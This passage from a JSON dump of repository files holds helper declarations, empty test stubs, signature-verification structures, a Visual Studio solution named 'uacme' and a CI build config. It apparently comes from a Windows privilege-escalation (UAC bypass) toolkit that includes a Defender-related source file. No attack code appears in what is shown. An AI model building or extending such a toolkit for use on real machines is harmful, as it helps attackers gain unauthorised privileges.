"content": "#/*******************************************************************************\n*\n* (C) COPYRIGHT AUTHORS, 2014 - 2021\n*\n* TITLE: SUP.H\n*\n* VERSION: 1.52\n*\n* DATE: 23 Nov 2021\n*\n* Common header file for the program support routines.\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n*******************************************************************************/\n#pragma once\n\n/*\n* supHeapAlloc\n*\n* Purpose:\n*\n* Wrapper for RtlAllocateHeap.\n*\n*/\nPVOID FORCEINLINE supHeapAlloc(\n _In_ SIZE_T Size)\n{\n return RtlAllocateHeap(NtCurrentPeb()->ProcessHeap, HEAP_ZERO_MEMORY, Size);\n}\n\n/*\n* supHeapFree\n*\n* Purpose:\n*\n* Wrapper for RtlFreeHeap.\n*\n*/\nBOOL FORCEINLINE supHeapFree(\n _In_ PVOID Memory)\n{\n return RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, Memory);\n}\n\nBOOL supIsCorImageFile(\n _In_ PVOID ImageBase);\n\nLPWSTR supReadKeyString(\n _In_ HKEY hKey,\n _In_ LPWSTR KeyValue,\n _In_ PDWORD pdwDataSize);\n\nPVOID supQueryKeyName(\n _In_ HKEY hKey,\n _Out_opt_ PSIZE_T ReturnedLength);\n\nBOOLEAN supIsProcess32bit(\n _In_ HANDLE hProcess);\n\nPVOID supFindPattern(\n _In_ CONST PBYTE Buffer,\n _In_ SIZE_T BufferSize,\n _In_ CONST PBYTE Pattern,\n _In_ SIZE_T PatternSize);\n\nLRESULT supRegReadDword(\n _In_ HKEY hKey,\n _In_ LPWSTR lpValueName,\n _In_ LPDWORD Value);\n\nPVOID supLookupImageSectionByName(\n _In_ CHAR* SectionName,\n _In_ ULONG SectionNameLength,\n _In_ PVOID DllBase,\n _Out_ PULONG SectionSize);\n\nBOOL supConcatenatePaths(\n _Inout_ LPWSTR Target,\n _In_ LPCWSTR Path,\n _In_ SIZE_T TargetBufferSize);\n"
},
{
"path": "Source/Yuubari/tests/test_fusion.c",
"content": "/*******************************************************************************\n*\n* (C) COPYRIGHT AUTHORS, 2015 - 2017\n*\n* TITLE: TEST_FUSION.C\n*\n* VERSION: 1.21\n*\n* DATE: 03 Mar 2017\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n*******************************************************************************/\n#include \"global.h\"\n#include \"fusion.h\"\n\nBYTE TestArray[1024 * 32] = { 0 };\n\nVOID TestActivationContext(\n VOID\n)\n{\n\n}\n"
},
{
"path": "Source/Yuubari/tests/test_fusion.h",
"content": "#/*******************************************************************************\n*\n* (C) COPYRIGHT AUTHORS, 2014 - 2017\n*\n* TITLE: TEST_FUSION.H\n*\n* VERSION: 1.10\n*\n* DATE: 20 Feb 2017\n*\n* Test unit header file.\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n*******************************************************************************/\n#pragma once\n\nVOID TestActivationContext(\n VOID\n);\n"
},
{
"path": "Source/Yuubari/wintrustex.h",
"content": "#pragma once\n\ntypedef enum _SIGNATURE_INFO_TYPE {\n SIT_UNKNOWN = 0x0,\n SIT_AUTHENTICODE = 0x1,\n SIT_CATALOG = 0x2\n} SIGNATURE_INFO_TYPE;\n\n#define SIF_AUTHENTICODE_SIGNED 0x1\n#define SIF_CATALOG_SIGNED 0x2\n#define SIF_VERSION_INFO 0x4\n#define SIF_CHECK_OS_BINARY 0x800\n#define SIF_BASE_VERIFICATION 0x1000\n#define SIF_CATALOG_FIRST 0x2000\n#define SIF_MOTW 0x4000\n\ntypedef enum _SIGNATURE_STATE {\n SIGNATURE_STATE_UNSIGNED_MISSING = 0x0,\n SIGNATURE_STATE_UNSIGNED_UNSUPPORTED = 0x1,\n SIGNATURE_STATE_UNSIGNED_POLICY = 0x2,\n SIGNATURE_STATE_INVALID_CORRUPT = 0x3,\n SIGNATURE_STATE_INVALID_POLICY = 0x4,\n SIGNATURE_STATE_VALID = 0x5,\n SIGNATURE_STATE_TRUSTED = 0x6,\n SIGNATURE_STATE_UNTRUSTED = 0x7,\n} SIGNATURE_STATE;\n\ntypedef struct _SIGNATURE_INFO {\n DWORD cbSize;\n SIGNATURE_STATE SignatureState;\n SIGNATURE_INFO_TYPE SignatureType;\n DWORD dwSignatureInfoAvailability;\n DWORD dwInfoAvailability;\n PWSTR pszDisplayName;\n DWORD cchDisplayName;\n PWSTR pszPublisherName;\n DWORD cchPublisherName;\n PWSTR pszMoreInfoURL;\n DWORD cchMoreInfoURL;\n LPBYTE prgbHash;\n DWORD cbHash;\n BOOL fOSBinary; //True if the item is signed as part of an operating system release\n} SIGNATURE_INFO, *PSIGNATURE_INFO;\n\ntypedef LONG (WINAPI *ptrWTGetSignatureInfo)(\n LPWSTR pszFile,\n HANDLE hFile,\n ULONG sigInfoFlags, //SIF_*\n SIGNATURE_INFO *siginfo,\n VOID *ppCertContext,\n VOID *phWVTStateData\n);\n"
},
{
"path": "Source/uacme.sln",
"content": "\nMicrosoft Visual Studio Solution File, Format Version 12.00\n# Visual Studio Version 17\nVisualStudioVersion = 17.2.32616.157\nMinimumVisualStudioVersion = 10.0.40219.1\nProject(\"{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}\") = \"Akagi\", \"Akagi\\uacme.vcxproj\", \"{210A3DB2-11E3-4BB4-BE7D-554935DCCA43}\"\nEndProject\nProject(\"{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}\") = \"Fubuki\", \"Fubuki\\dll.vcxproj\", \"{23A2E629-DC9D-46EA-8B5A-F1D60566EA09}\"\nEndProject\nProject(\"{2150E333-8FDC-42A3-9474-1A3956D46DE8}\") = \"shared\", \"shared\", \"{49552A73-F1A4-44FA-94C0-5CDD84F48717}\"\n\tProjectSection(SolutionItems) = preProject\n\t\tShared\\consts.h = Shared\\consts.h\n\t\tShared\\libinc.h = Shared\\libinc.h\n\t\tShared\\shared.h = Shared\\shared.h\n\t\tShared\\util.c = Shared\\util.c\n\t\tShared\\util.h = Shared\\util.h\n\t\tShared\\windefend.c = Shared\\windefend.c\n\t\tShared\\windefend.h = Shared\\windefend.h\n\tEndProjectSection\nEndProject\nProject(\"{2150E333-8FDC-42A3-9474-1A3956D46DE8}\") = \"NanoDesu\", \"NanoDesu\", \"{04845492-BD9E-4EC6-ACA4-4A0A460B3508}\"\nEndProject\nProject(\"{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}\") = \"Naka\", \"Naka\\Naka.vcxproj\", \"{3BEF8A16-981F-4C65-8AE7-C612B46BE446}\"\nEndProject\nProject(\"{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}\") = \"Yuubari\", \"Yuubari\\Yuubari.vcxproj\", \"{304D5A8A-EF98-4E21-8F4D-91E66E0BECAC}\"\nEndProject\nProject(\"{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}\") = \"Akatsuki\", \"Akatsuki\\Akatsuki.vcxproj\", \"{07EF7652-1C2D-478B-BB4B-F9560695A387}\"\nEndProject\nProject(\"{2150E333-8FDC-42A3-9474-1A3956D46DE8}\") = \"minirtl\", \"minirtl\", \"{45D748AC-9B16-426E-808D-94662B0417F7}\"\n\tProjectSection(SolutionItems) = preProject\n\t\tShared\\cmdline.c = Shared\\cmdline.c\n\t\tShared\\minirtl.h = Shared\\minirtl.h\n\t\tShared\\rtltypes.h = Shared\\rtltypes.h\n\t\tShared\\strtoul.c = Shared\\strtoul.c\n\t\tShared\\u64tohex.c = Shared\\u64tohex.c\n\t\tShared\\_filename.c = Shared\\_filename.c\n\t\tShared\\_strcat.c = Shared\\_strcat.c\n\t\tShared\\_strcmp.c = Shared\\_strcmp.c\n\t\tShared\\_strcmpi.c = Shared\\_strcmpi.c\n\t\tShared\\_strcpy.c = Shared\\_strcpy.c\n\t\tShared\\_strend.c = Shared\\_strend.c\n\t\tShared\\_strlen.c = Shared\\_strlen.c\n\t\tShared\\_strncmp.c = Shared\\_strncmp.c\n\t\tshared\\_strncmpi.c = shared\\_strncmpi.c\n\t\tShared\\_strncpy.c = Shared\\_strncpy.c\n\t\tShared\\_strstri.c = Shared\\_strstri.c\n\tEndProjectSection\nEndProject\nProject(\"{2150E333-8FDC-42A3-9474-1A3956D46DE8}\") = \"ntos\", \"ntos\", \"{876F1157-B68F-4D0A-B963-6157B266DDE5}\"\n\tProjectSection(SolutionItems) = preProject\n\t\tShared\\ntos\\ntbuilds.h = Shared\\ntos\\ntbuilds.h\n\t\tShared\\ntos\\ntos.h = Shared\\ntos\\ntos.h\n\t\tShared\\ntos\\ntsxs.h = Shared\\ntos\\ntsxs.h\n\tEndProjectSection\nEndProject\nGlobal\n\tGlobalSection(SolutionConfigurationPlatforms) = preSolution\n\t\tDebug|Win32 = Debug|Win32\n\t\tDebug|x64 = Debug|x64\n\t\tDebugConsole|Win32 = DebugConsole|Win32\n\t\tDebugConsole|x64 = DebugConsole|x64\n\t\tRelease|Win32 = Release|Win32\n\t\tRelease|x64 = Release|x64\n\t\tReleaseInternal|Win32 = ReleaseInternal|Win32\n\t\tReleaseInternal|x64 = ReleaseInternal|x64\n\t\tReleaseInternalConsole|Win32 = ReleaseInternalConsole|Win32\n\t\tReleaseInternalConsole|x64 = ReleaseInternalConsole|x64\n\tEndGlobalSection\n\tGlobalSection(ProjectConfigurationPlatforms) = postSolution\n\t\t{210A3DB2-11E3-4BB4-BE7D-554935DCCA43}.Debug|Win32.ActiveCfg = Debug|Win32\n\t\t{210A3DB2-11E3-4BB4-BE7D-554935DCCA43}.Debug|Win32.Build.0 = Debug|Win32\n\t\t{210A3DB2-11E3-4BB4-BE7D-554935DCCA43}.Debug|x64.ActiveCfg = Debug|x64\n\t\t{210A3DB2-11E3-4BB4-BE7D-554935DCCA43}.Debug|x64.Build.0 = Debug|x64\n\t\t{210A3DB2-11E3-4BB4-BE7D-554935DCCA43}.DebugConsole|Win32.ActiveCfg = DebugConsole|Win32\n\t\t{210A3DB2-11E3-4BB4-BE7D-554935DCCA43}.DebugConsole|Win32.Build.0 = DebugConsole|Win32\n\t\t{210A3DB2-11E3-4BB4-BE7D-554935DCCA43}.DebugConsole|x64.ActiveCfg = DebugConsole|x64\n\t\t{210A3DB2-11E3-4BB4-BE7D-554935DCCA43}.DebugConsole|x64.Build.0 = DebugConsole|x64\n\t\t{210A3DB2-11E3-4BB4-BE7D-554935DCCA43}.Release|Win32.ActiveCfg = Release|Win32\n\t\t{210A3DB2-11E3-4BB4-BE7D-554935DCCA43}.Release|Win32.Build.0 = Release|Win32\n\t\t{210A3DB2-11E3-4BB4-BE7D-554935DCCA43}.Release|x64.ActiveCfg = Release|x64\n\t\t{210A3DB2-11E3-4BB4-BE7D-554935DCCA43}.Release|x64.Build.0 = Release|x64\n\t\t{210A3DB2-11E3-4BB4-BE7D-554935DCCA43}.ReleaseInternal|Win32.ActiveCfg = ReleaseInternal|Win32\n\t\t{210A3DB2-11E3-4BB4-BE7D-554935DCCA43}.ReleaseInternal|Win32.Build.0 = ReleaseInternal|Win32\n\t\t{210A3DB2-11E3-4BB4-BE7D-554935DCCA43}.ReleaseInternal|x64.ActiveCfg = ReleaseInternal|x64\n\t\t{210A3DB2-11E3-4BB4-BE7D-554935DCCA43}.ReleaseInternal|x64.Build.0 = ReleaseInternal|x64\n\t\t{210A3DB2-11E3-4BB4-BE7D-554935DCCA43}.ReleaseInternalConsole|Win32.ActiveCfg = ReleaseInternalConsole|Win32\n\t\t{210A3DB2-11E3-4BB4-BE7D-554935DCCA43}.ReleaseInternalConsole|Win32.Build.0 = ReleaseInternalConsole|Win32\n\t\t{210A3DB2-11E3-4BB4-BE7D-554935DCCA43}.ReleaseInternalConsole|x64.ActiveCfg = ReleaseInternalConsole|x64\n\t\t{210A3DB2-11E3-4BB4-BE7D-554935DCCA43}.ReleaseInternalConsole|x64.Build.0 = ReleaseInternalConsole|x64\n\t\t{23A2E629-DC9D-46EA-8B5A-F1D60566EA09}.Debug|Win32.ActiveCfg = Debug|Win32\n\t\t{23A2E629-DC9D-46EA-8B5A-F1D60566EA09}.Debug|Win32.Build.0 = Debug|Win32\n\t\t{23A2E629-DC9D-46EA-8B5A-F1D60566EA09}.Debug|x64.ActiveCfg = Debug|x64\n\t\t{23A2E629-DC9D-46EA-8B5A-F1D60566EA09}.DebugConsole|Win32.ActiveCfg = Debug|Win32\n\t\t{23A2E629-DC9D-46EA-8B5A-F1D60566EA09}.DebugConsole|Win32.Build.0 = Debug|Win32\n\t\t{23A2E629-DC9D-46EA-8B5A-F1D60566EA09}.DebugConsole|x64.ActiveCfg = Debug|x64\n\t\t{23A2E629-DC9D-46EA-8B5A-F1D60566EA09}.DebugConsole|x64.Build.0 = Debug|x64\n\t\t{23A2E629-DC9D-46EA-8B5A-F1D60566EA09}.Release|Win32.ActiveCfg = Release|Win32\n\t\t{23A2E629-DC9D-46EA-8B5A-F1D60566EA09}.Release|Win32.Build.0 = Release|Win32\n\t\t{23A2E629-DC9D-46EA-8B5A-F1D60566EA09}.Release|x64.ActiveCfg = Release|x64\n\t\t{23A2E629-DC9D-46EA-8B5A-F1D60566EA09}.Release|x64.Build.0 = Release|x64\n\t\t{23A2E629-DC9D-46EA-8B5A-F1D60566EA09}.ReleaseInternal|Win32.ActiveCfg = ReleaseInternal|Win32\n\t\t{23A2E629-DC9D-46EA-8B5A-F1D60566EA09}.ReleaseInternal|Win32.Build.0 = ReleaseInternal|Win32\n\t\t{23A2E629-DC9D-46EA-8B5A-F1D60566EA09}.ReleaseInternal|x64.ActiveCfg = ReleaseInternal|x64\n\t\t{23A2E629-DC9D-46EA-8B5A-F1D60566EA09}.ReleaseInternal|x64.Build.0 = ReleaseInternal|x64\n\t\t{23A2E629-DC9D-46EA-8B5A-F1D60566EA09}.ReleaseInternalConsole|Win32.ActiveCfg = ReleaseInternalConsole|x64\n\t\t{23A2E629-DC9D-46EA-8B5A-F1D60566EA09}.ReleaseInternalConsole|x64.ActiveCfg = ReleaseInternal|x64\n\t\t{23A2E629-DC9D-46EA-8B5A-F1D60566EA09}.ReleaseInternalConsole|x64.Build.0 = ReleaseInternal|x64\n\t\t{3BEF8A16-981F-4C65-8AE7-C612B46BE446}.Debug|Win32.ActiveCfg = Debug|Win32\n\t\t{3BEF8A16-981F-4C65-8AE7-C612B46BE446}.Debug|Win32.Build.0 = Debug|Win32\n\t\t{3BEF8A16-981F-4C65-8AE7-C612B46BE446}.Debug|x64.ActiveCfg = Debug|x64\n\t\t{3BEF8A16-981F-4C65-8AE7-C612B46BE446}.Debug|x64.Build.0 = Debug|x64\n\t\t{3BEF8A16-981F-4C65-8AE7-C612B46BE446}.DebugConsole|Win32.ActiveCfg = Debug|Win32\n\t\t{3BEF8A16-981F-4C65-8AE7-C612B46BE446}.DebugConsole|Win32.Build.0 = Debug|Win32\n\t\t{3BEF8A16-981F-4C65-8AE7-C612B46BE446}.DebugConsole|x64.ActiveCfg = Debug|x64\n\t\t{3BEF8A16-981F-4C65-8AE7-C612B46BE446}.DebugConsole|x64.Build.0 = Debug|x64\n\t\t{3BEF8A16-981F-4C65-8AE7-C612B46BE446}.Release|Win32.ActiveCfg = Release|Win32\n\t\t{3BEF8A16-981F-4C65-8AE7-C612B46BE446}.Release|Win32.Build.0 = Release|Win32\n\t\t{3BEF8A16-981F-4C65-8AE7-C612B46BE446}.Release|x64.ActiveCfg = Release|x64\n\t\t{3BEF8A16-981F-4C65-8AE7-C612B46BE446}.Release|x64.Build.0 = Release|x64\n\t\t{3BEF8A16-981F-4C65-8AE7-C612B46BE446}.ReleaseInternal|Win32.ActiveCfg = ReleaseInternal|Win32\n\t\t{3BEF8A16-981F-4C65-8AE7-C612B46BE446}.ReleaseInternal|Win32.Build.0 = ReleaseInternal|Win32\n\t\t{3BEF8A16-981F-4C65-8AE7-C612B46BE446}.ReleaseInternal|x64.ActiveCfg = ReleaseInternal|x64\n\t\t{3BEF8A16-981F-4C65-8AE7-C612B46BE446}.ReleaseInternal|x64.Build.0 = ReleaseInternal|x64\n\t\t{3BEF8A16-981F-4C65-8AE7-C612B46BE446}.ReleaseInternalConsole|Win32.ActiveCfg = ReleaseInternalConsole|x64\n\t\t{3BEF8A16-981F-4C65-8AE7-C612B46BE446}.ReleaseInternalConsole|x64.ActiveCfg = ReleaseInternal|x64\n\t\t{3BEF8A16-981F-4C65-8AE7-C612B46BE446}.ReleaseInternalConsole|x64.Build.0 = ReleaseInternal|x64\n\t\t{304D5A8A-EF98-4E21-8F4D-91E66E0BECAC}.Debug|Win32.ActiveCfg = Debug|x64\n\t\t{304D5A8A-EF98-4E21-8F4D-91E66E0BECAC}.Debug|x64.ActiveCfg = Debug|x64\n\t\t{304D5A8A-EF98-4E21-8F4D-91E66E0BECAC}.Debug|x64.Build.0 = Debug|x64\n\t\t{304D5A8A-EF98-4E21-8F4D-91E66E0BECAC}.DebugConsole|Win32.ActiveCfg = Debug|x64\n\t\t{304D5A8A-EF98-4E21-8F4D-91E66E0BECAC}.DebugConsole|Win32.Build.0 = Debug|x64\n\t\t{304D5A8A-EF98-4E21-8F4D-91E66E0BECAC}.DebugConsole|x64.ActiveCfg = Debug|x64\n\t\t{304D5A8A-EF98-4E21-8F4D-91E66E0BECAC}.DebugConsole|x64.Build.0 = Debug|x64\n\t\t{304D5A8A-EF98-4E21-8F4D-91E66E0BECAC}.Release|Win32.ActiveCfg = Release|x64\n\t\t{304D5A8A-EF98-4E21-8F4D-91E66E0BECAC}.Release|x64.ActiveCfg = Release|x64\n\t\t{304D5A8A-EF98-4E21-8F4D-91E66E0BECAC}.Release|x64.Build.0 = Release|x64\n\t\t{304D5A8A-EF98-4E21-8F4D-91E66E0BECAC}.ReleaseInternal|Win32.ActiveCfg = ReleaseInternal|x64\n\t\t{304D5A8A-EF98-4E21-8F4D-91E66E0BECAC}.ReleaseInternal|Win32.Build.0 = ReleaseInternal|x64\n\t\t{304D5A8A-EF98-4E21-8F4D-91E66E0BECAC}.ReleaseInternal|x64.ActiveCfg = ReleaseInternal|x64\n\t\t{304D5A8A-EF98-4E21-8F4D-91E66E0BECAC}.ReleaseInternal|x64.Build.0 = ReleaseInternal|x64\n\t\t{304D5A8A-EF98-4E21-8F4D-91E66E0BECAC}.ReleaseInternalConsole|Win32.ActiveCfg = ReleaseInternalConsole|x64\n\t\t{304D5A8A-EF98-4E21-8F4D-91E66E0BECAC}.ReleaseInternalConsole|Win32.Build.0 = ReleaseInternalConsole|x64\n\t\t{304D5A8A-EF98-4E21-8F4D-91E66E0BECAC}.ReleaseInternalConsole|x64.ActiveCfg = ReleaseInternal|x64\n\t\t{304D5A8A-EF98-4E21-8F4D-91E66E0BECAC}.ReleaseInternalConsole|x64.Build.0 = ReleaseInternal|x64\n\t\t{07EF7652-1C2D-478B-BB4B-F9560695A387}.Debug|Win32.ActiveCfg = Debug|x64\n\t\t{07EF7652-1C2D-478B-BB4B-F9560695A387}.Debug|x64.ActiveCfg = Debug|x64\n\t\t{07EF7652-1C2D-478B-BB4B-F9560695A387}.Debug|x64.Build.0 = Debug|x64\n\t\t{07EF7652-1C2D-478B-BB4B-F9560695A387}.DebugConsole|Win32.ActiveCfg = Debug|x64\n\t\t{07EF7652-1C2D-478B-BB4B-F9560695A387}.DebugConsole|Win32.Build.0 = Debug|x64\n\t\t{07EF7652-1C2D-478B-BB4B-F9560695A387}.DebugConsole|x64.ActiveCfg = Debug|x64\n\t\t{07EF7652-1C2D-478B-BB4B-F9560695A387}.DebugConsole|x64.Build.0 = Debug|x64\n\t\t{07EF7652-1C2D-478B-BB4B-F9560695A387}.Release|Win32.ActiveCfg = Release|x64\n\t\t{07EF7652-1C2D-478B-BB4B-F9560695A387}.Release|x64.ActiveCfg = Release|x64\n\t\t{07EF7652-1C2D-478B-BB4B-F9560695A387}.Release|x64.Build.0 = Release|x64\n\t\t{07EF7652-1C2D-478B-BB4B-F9560695A387}.ReleaseInternal|Win32.ActiveCfg = ReleaseInternal|x64\n\t\t{07EF7652-1C2D-478B-BB4B-F9560695A387}.ReleaseInternal|Win32.Build.0 = ReleaseInternal|x64\n\t\t{07EF7652-1C2D-478B-BB4B-F9560695A387}.ReleaseInternal|x64.ActiveCfg = ReleaseInternal|x64\n\t\t{07EF7652-1C2D-478B-BB4B-F9560695A387}.ReleaseInternal|x64.Build.0 = ReleaseInternal|x64\n\t\t{07EF7652-1C2D-478B-BB4B-F9560695A387}.ReleaseInternalConsole|Win32.ActiveCfg = ReleaseInternalConsole|x64\n\t\t{07EF7652-1C2D-478B-BB4B-F9560695A387}.ReleaseInternalConsole|Win32.Build.0 = ReleaseInternalConsole|x64\n\t\t{07EF7652-1C2D-478B-BB4B-F9560695A387}.ReleaseInternalConsole|x64.ActiveCfg = ReleaseInternal|x64\n\t\t{07EF7652-1C2D-478B-BB4B-F9560695A387}.ReleaseInternalConsole|x64.Build.0 = ReleaseInternal|x64\n\tEndGlobalSection\n\tGlobalSection(SolutionProperties) = preSolution\n\t\tHideSolutionNode = FALSE\n\tEndGlobalSection\n\tGlobalSection(NestedProjects) = preSolution\n\t\t{23A2E629-DC9D-46EA-8B5A-F1D60566EA09} = {04845492-BD9E-4EC6-ACA4-4A0A460B3508}\n\t\t{3BEF8A16-981F-4C65-8AE7-C612B46BE446} = {04845492-BD9E-4EC6-ACA4-4A0A460B3508}\n\t\t{07EF7652-1C2D-478B-BB4B-F9560695A387} = {04845492-BD9E-4EC6-ACA4-4A0A460B3508}\n\t\t{45D748AC-9B16-426E-808D-94662B0417F7} = {49552A73-F1A4-44FA-94C0-5CDD84F48717}\n\t\t{876F1157-B68F-4D0A-B963-6157B266DDE5} = {49552A73-F1A4-44FA-94C0-5CDD84F48717}\n\tEndGlobalSection\n\tGlobalSection(ExtensibilityGlobals) = postSolution\n\t\tSolutionGuid = {34101EC9-C266-4BF6-AC89-898FF5B54501}\n\tEndGlobalSection\nEndGlobal\n"
},
{
"path": "appveyor.yml",
"content": "version: 1.0.{build}\nbranches:\n only:\n - master\n\nimage: Visual Studio 2022\n\nconfiguration: Release\nplatform: x64\n\nclone_folder: c:\\projects\\uacme\n\nbuild_script:\n - cmd: msbuild Source\\uacme.sln /m /v:normal /p:Configuration=Release /p:Platform=x64 /p:PlatformToolset=v143\n"
}
]